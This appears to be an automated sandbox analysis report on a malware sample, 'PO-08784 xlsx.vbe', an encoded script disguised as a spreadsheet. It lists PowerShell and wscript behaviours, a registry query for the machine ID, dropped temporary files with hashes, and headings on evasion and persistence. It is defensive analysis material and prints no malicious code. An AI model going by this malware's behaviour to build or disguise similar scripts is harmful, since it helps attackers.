Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	755441
Product:	CloudBasic
Start time:	17:57:24
Start date:	28.11.2022
Sample:	PO-08784 xlsx.vbe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	266115592f966240c14dfeeec624bdf5
SHA1:	455a06b52d8e8f46d9a80067d3d1b1ea23036d65
SHA256:	1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	937C6E940577634844311E349BD4614D	379440E933201CD3E6E6BF9B0E61B7663693195F	30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
C:\Users\user\AppData\Local\Temp\RES47C6.tmp	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Nov 29 01:59:36 2022, 1st section name ".debug$S"	1C80558DCC94D3FD4F7B17286D92DF42	F3681A06D954ACB58F4220D7B5254D932DCC76FB	D72A354494ECF6C41CD3CCD149DBED680A12218A5F47DCAE1268F82FF0F0CBF1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5urju1b3.luw.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbwcl3vc.3eg.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP	MSVC .res	998B7FA2FFBE54BE98BEC5121AE6FE70	46F990AC5C9ADC468B57D96D57B88373DB496337	AF3E64F5A6A5B28C61E346B2572EFEC45CCE288AA9AEF0F165DFB6074369A032
C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.0.cs	Unicode text, UTF-8 (with BOM) text, with very long lines (1075), with no line terminators	D697E139982C89FE5B0FD2410BE24D8A	A4436350800275EAB95B8C9FFF79C1A5AA3D5783	7665F657D3972656C1ACBD5C46C4E1886F2CB8B427C0996BC78A34DCCF00C459
C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline	Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators	8D659EF1EB3A75D7370EB00129EEC3A8	EA3BD80A8CC1B6495A97CDA8F0A4E8FA0C9DD08E	6D94C527B8C7BAD892E5DE2870056C9F5AE44ECCA51A1AF82EA02EB2DBD2FA20
C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	DF046D645321C882E947BA0D536D11B6	79D0A1689D20FF3139DCFEC21F8808E8F7C7B128	77576BF5143A3AB3D2C287994FE49A0D5D0E64E7D6D06DF5870E00023E418725
C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.out	Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators	DC0E7F90DE528663E8E504CF226E871C	34FC3D9AD0A1BE5FCDF3EFB42934B80C54946C00	52F005C1E64201E649E456E32C44F11F2B27868A81027F3D1D735916FB3D5F94

Windows Analysis Report
PO-08784 xlsx.vbe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Windows Analysis Report PO-08784 xlsx.vbe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Windows Analysis Report
PO-08784 xlsx.vbe